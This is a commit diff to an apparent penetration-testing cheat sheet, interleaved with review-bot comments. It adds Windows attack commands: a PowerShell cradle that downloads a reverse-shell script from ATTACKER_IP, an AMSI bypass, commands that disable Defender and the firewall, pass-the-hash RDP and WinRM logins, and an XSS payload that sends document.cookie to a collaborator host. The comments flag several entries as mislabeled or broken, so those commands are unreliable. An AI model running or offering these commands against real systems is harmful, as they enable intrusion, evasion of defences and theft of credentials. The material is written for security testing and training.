AD update CME+DCOM
parent
22340c8fc2
commit
08b59f2856
@ -28,6 +28,7 @@
|
|||
* [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
|
||||
* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
|
||||
* [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/)
|
||||
* [AutoGraphql + introspection](https://graphql-dashboard.herokuapp.com/)
|
||||
|
||||
## Exploit
|
||||
|
||||
|
|
|
@ -646,4 +646,5 @@ E
|
|||
* [Dechaining macros and evading EDR - Noora Hyvärinen](https://blog.f-secure.com/dechaining-macros-and-evading-edr/)
|
||||
* [Executing macros from docx with remote - RedXORBlueJuly 18, 2018](http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html)
|
||||
* [One thousand and one ways to copy your shellcode to memory (VBA Macros) - X-C3LL - Feb 18, 2021](https://adepts.of0x.cc/alternatives-copy-shellcode/)
|
||||
* [Running macros via ActiveX controls - greyhathacker - September 29, 2016](http://www.greyhathacker.net/?p=948)
|
||||
* [Running macros via ActiveX controls - greyhathacker - September 29, 2016](http://www.greyhathacker.net/?p=948)
|
||||
* [Anti-Analysis Techniques Used in Excel 4.0 Macros - 24 March 2021 - @Jacob_Pimental](https://www.goggleheadedhacker.com/blog/post/23)
|
|
@ -8,6 +8,7 @@
|
|||
* [Network Enumeration](#network-enumeration)
|
||||
* [Antivirus & Detections](#antivirus--detections)
|
||||
* [Windows Defender](#windows-defender)
|
||||
* [Firewall](#firewall)
|
||||
* [AppLocker Enumeration](#applocker-enumeration)
|
||||
* [Powershell](#powershell)
|
||||
* [Default Writeable Folders](#default-writeable-folders)
|
||||
|
@ -97,6 +98,11 @@
|
|||
python3 wes.py --update
|
||||
python3 wes.py systeminfo.txt
|
||||
```
|
||||
- [PrivescCheck - Privilege Escalation Enumeration Script for Windows](https://github.com/itm4n/PrivescCheck)
|
||||
```powershell
|
||||
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
|
||||
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
|
||||
```
|
||||
|
||||
## Windows Version and Configuration
|
||||
|
||||
|
@ -184,6 +190,14 @@ Get-LocalGroupMember Administrators | ft Name, PrincipalSource
|
|||
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
|
||||
```
|
||||
|
||||
Get Domain Controllers
|
||||
|
||||
```powershell
|
||||
nltest /DCLIST:DomainName
|
||||
nltest /DCNAME:DomainName
|
||||
nltest /DSGETDC:DomainName
|
||||
```
|
||||
|
||||
## Network Enumeration
|
||||
|
||||
List all network interfaces, IP, and DNS.
|
||||
|
@ -214,30 +228,6 @@ List all current connections
|
|||
netstat -ano
|
||||
```
|
||||
|
||||
List firewall state and current configuration
|
||||
|
||||
```powershell
|
||||
netsh advfirewall firewall dump
|
||||
|
||||
or
|
||||
|
||||
netsh firewall show state
|
||||
netsh firewall show config
|
||||
```
|
||||
|
||||
List firewall's blocked ports
|
||||
|
||||
```powershell
|
||||
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
|
||||
```
|
||||
|
||||
Disable firewall
|
||||
|
||||
```powershell
|
||||
netsh firewall set opmode disable
|
||||
netsh advfirewall set allprofiles state off
|
||||
```
|
||||
|
||||
List all network shares
|
||||
|
||||
```powershell
|
||||
|
@ -262,7 +252,7 @@ Enumerate antivirus on a box with `WMIC /Node:localhost /Namespace:\\root\Securi
|
|||
# check status of Defender
|
||||
PS C:\> Get-MpComputerStatus
|
||||
|
||||
# disable Real Time Monitoring
|
||||
# disable scanning all downloaded files and attachments, disable AMSI (reactive)
|
||||
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
|
||||
PS C:\> Set-MpPreference -DisableIOAVProtection $true
|
||||
|
||||
|
@ -272,18 +262,59 @@ PS C:\> Set-MpPreference -DisableScriptScanning 1
|
|||
# exclude a folder
|
||||
PS C:\> Add-MpPreference -ExclusionPath "C:\Temp"
|
||||
PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
|
||||
PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
|
||||
|
||||
# remove signatures (if Internet connection is present, they will be downloaded again):
|
||||
PS > "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
|
||||
```
|
||||
|
||||
### Firewall
|
||||
|
||||
List firewall state and current configuration
|
||||
|
||||
```powershell
|
||||
netsh advfirewall firewall dump
|
||||
# or
|
||||
netsh firewall show state
|
||||
netsh firewall show config
|
||||
```
|
||||
|
||||
List firewall's blocked ports
|
||||
|
||||
```powershell
|
||||
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
|
||||
```
|
||||
|
||||
Disable firewall
|
||||
|
||||
```powershell
|
||||
# Disable Firewall on Windows 7 via cmd
|
||||
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||
|
||||
# Disable Firewall on Windows 7 via Powershell
|
||||
powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'`
|
||||
|
||||
# Disable Firewall on any windows via cmd
|
||||
netsh firewall set opmode disable
|
||||
netsh Advfirewall set allprofiles state off
|
||||
```
|
||||
|
||||
|
||||
### AppLocker Enumeration
|
||||
|
||||
- With the GPO
|
||||
- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
|
||||
|
||||
List AppLocker rules
|
||||
|
||||
```powershell
|
||||
PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
|
||||
```
|
||||
* List AppLocker rules
|
||||
```powershell
|
||||
PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
|
||||
```
|
||||
|
||||
* Applocker Bypass
|
||||
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
|
||||
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
|
||||
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
|
||||
|
||||
### Powershell
|
||||
|
||||
|
@ -294,6 +325,22 @@ C:\windows\syswow64\windowspowershell\v1.0\powershell
|
|||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
|
||||
```
|
||||
|
||||
Powershell Constrained Mode
|
||||
|
||||
```powershell
|
||||
# Check if we are in a constrained mode
|
||||
$ExecutionContext.SessionState.LanguageMode
|
||||
|
||||
PS > &{ whoami }
|
||||
powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
|
||||
|
||||
# PowerShDLL - Powershell with no Powershell.exe via DLL’s
|
||||
# https://github.com/p3nt4/PowerShdll
|
||||
ftp> rundll32.exe C:\temp\PowerShdll.dll,main
|
||||
```
|
||||
|
||||
|
||||
|
||||
Example of AMSI Bypass.
|
||||
|
||||
```powershell
|
||||
|
@ -307,7 +354,9 @@ PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetF
|
|||
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
|
||||
C:\Windows\System32\spool\drivers\color
|
||||
C:\Windows\Tasks
|
||||
C:\windows\tracing
|
||||
C:\Windows\tracing
|
||||
C:\Windows\Temp
|
||||
C:\Users\Public
|
||||
```
|
||||
|
||||
## EoP - Looting for passwords
|
||||
|
@ -859,6 +908,7 @@ Then you can use `runas` with the `/savecred` options in order to use the saved
|
|||
The following example is calling a remote binary via an SMB share.
|
||||
```powershell
|
||||
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
|
||||
runas /savecred /user:Administrator "cmd.exe /k whoami"
|
||||
```
|
||||
|
||||
Using `runas` with a provided set of credential.
|
||||
|
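Review bot: The `# Disable Firewall on Windows 7 via cmd` entry in the Firewall hunk is mislabeled and misspelled: the key path reads `CurentControlSet` instead of `CurrentControlSet`, and `fDenyTSConnections` is the Remote Desktop toggle rather than a firewall setting — the lateral-movement file in this same commit lists the identical `reg add` under `# Enable RDP`. The PowerShell variant two lines below is also malformed (`–Value` is an en dash with no value, and the line ends in a stray backtick), so it will not parse as written. Either drop both entries or relabel them `# Enable RDP (fDenyTSConnections=0)` with the corrected path; the `netsh` lines that follow are the only ones in that block that change firewall state. Separately, `List AppLocker rules` and its `Get-AppLockerPolicy` snippet appear twice in the AppLocker hunk; if both copies are on the new side, one looks like a leftover of the restructuring.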
@ -132,8 +132,12 @@ Require:
|
|||
```powershell
|
||||
root@payload$ git clone https://github.com/Hackplayers/evil-winrm
|
||||
root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
|
||||
root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
|
||||
root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
|
||||
root@payload$ ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
|
||||
root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u username -H BD1C6503987F8FF006296118F359FA79
|
||||
root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u username -p password -r domain.local
|
||||
|
||||
*Evil-WinRM* PS > Bypass-4MSI
|
||||
*Evil-WinRM* PS > IEX([Net.Webclient]::new().DownloadString("http://127.0.0.1/PowerView.ps1"))
|
||||
```
|
||||
|
||||
or using a custom ruby code to interact with the WinRM service.
|
||||
|
@ -169,6 +173,11 @@ end
|
|||
```powershell
|
||||
PS> Enable-PSRemoting
|
||||
|
||||
# use credential
|
||||
PS> $pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
|
||||
PS> $cred = New-Object System.Management.Automation.PSCredential ('DOMAIN\Username', $pass)
|
||||
PS> Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
|
||||
|
||||
# one-to-one interactive session
|
||||
PS> Enter-PSSession -computerName DC01
|
||||
[DC01]: PS>
|
||||
|
@ -239,54 +248,49 @@ PS C:\> PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -
|
|||
|
||||
## RDP Remote Desktop Protocol
|
||||
|
||||
Abuse RDP protocol to execute commands remotely with [SharpRDP](https://github.com/0xthirteen/SharpRDP)
|
||||
|
||||
```powershell
|
||||
PS C:\> SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
|
||||
```
|
||||
|
||||
Or connect remotely with `rdesktop`
|
||||
|
||||
```powershell
|
||||
root@payload$ rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
|
||||
root@payload$ rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
|
||||
# -g : the screen will take up 70% of your actual screen size
|
||||
# -r disk:share : sharing a local folder during a remote desktop session
|
||||
```
|
||||
|
||||
Note: you may need to enable it with the following command
|
||||
:warning: **NOTE**: You may need to enable RDP and disable NLA and fix CredSSP errors.
|
||||
|
||||
```powershell
|
||||
# Enable RDP
|
||||
PS C:\> reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
|
||||
PS C:\> netsh firewall set service remoteadmin enable
|
||||
PS C:\> netsh firewall set service remotedesktop enable
|
||||
```
|
||||
|
||||
or with psexec(sysinternals)
|
||||
|
||||
```powershell
|
||||
PS C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
|
||||
```
|
||||
|
||||
or with crackmapexec
|
||||
|
||||
```powershell
|
||||
# Alternative
|
||||
C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
|
||||
root@payload$ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
||||
|
||||
# Fix CredSSP errors
|
||||
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
|
||||
|
||||
# Disable NLA
|
||||
PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").UserAuthenticationRequired
|
||||
PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)
|
||||
```
|
||||
|
||||
or with Metasploit
|
||||
Abuse RDP protocol to execute commands remotely with the following commands;
|
||||
|
||||
```powershell
|
||||
root@payload$ run getgui -u admin -p 1234
|
||||
```
|
||||
* `rdesktop`
|
||||
```powershell
|
||||
root@payload$ rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
|
||||
root@payload$ rdesktop -u username -p password -g 70% -r disk:share=/tmp/myshare 10.10.10.10
|
||||
# -g : the screen will take up 70% of your actual screen size
|
||||
# -r disk:share : sharing a local folder during a remote desktop session
|
||||
```
|
||||
* `freerdp`
|
||||
```powershell
|
||||
root@payload$ xfreerdp /v:10.0.0.1 /u:'Username' /p:'Password123!' +clipboard /cert-ignore /size:1366x768 /smart-sizing
|
||||
root@payload$ xfreerdp /v:10.0.0.1 /u:username # password will be asked
|
||||
|
||||
# pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
|
||||
# pass the hash works for Server 2012 R2 / Win 8.1+
|
||||
root@payload$ xfreerdp /v:10.0.0.1 /u:username /d:domain /pth:88a405e17c0aa5debbc9b5679753939d
|
||||
```
|
||||
* [SharpRDP](https://github.com/0xthirteen/SharpRDP)
|
||||
```powershell
|
||||
PS C:\> SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
|
||||
```
|
||||
|
||||
or with xfreerdp
|
||||
|
||||
```powershell
|
||||
root@payload$ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
|
||||
root@payload$ xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
|
||||
root@payload$ xfreerd /u:runner /v:10.0.0.1 # password will be asked
|
||||
```
|
||||
|
||||
## Netuse
|
||||
|
||||
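Review bot: The `# Fix CredSSP errors` comment in the RDP hunk sits above two `reg add` lines that set `fDenyTSConnections` and `UserAuthentication` to 0 — that enables RDP and turns off Network Level Authentication, which is what the `# Disable NLA` comment two lines later already describes, not a CredSSP fix. The label matters because lowering `UserAuthentication` weakens the host's RDP authentication, and a reader or a defender triaging a registry-change alert should see it named honestly, e.g. `# Disable NLA (UserAuthentication=0, weakens RDP auth)`. The `rdesktop` and `xfreerdp` examples also appear twice with diverging flags (`-g 70` vs `-g 70%`, the `/pth:` line with and without `/d:`); whichever copy is on the new side, the other appears to be a leftover that should be removed so the two blocks do not drift apart.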
@ -90,6 +90,18 @@ fclose($fp);
|
|||
?>
|
||||
```
|
||||
|
||||
### CORS
|
||||
|
||||
```html
|
||||
<script>
|
||||
fetch('https://<SESSION>.burpcollaborator.net', {
|
||||
method: 'POST',
|
||||
mode: 'no-cors',
|
||||
body: document.cookie
|
||||
});
|
||||
</script>
|
||||
```
|
||||
|
||||
### UI redressing
|
||||
|
||||
Leverage the XSS to modify the HTML content of the page in order to display a fake login form.
|
||||
|
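Review bot: The new `### CORS` heading does not describe the snippet under it: the `fetch` posts `document.cookie` to a collaborator host, and `mode: 'no-cors'` is there only so the request goes out without a preflight — it is a cookie-exfiltration example, not a CORS technique. A heading such as `### Cookie exfiltration via no-cors fetch` would be accurate, and a one-line remark that `document.cookie` cannot read cookies carrying the `HttpOnly` flag would tell readers what mitigates it. `<SESSION>` should be called out as a placeholder the reader substitutes, since it is not a real hostname.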
|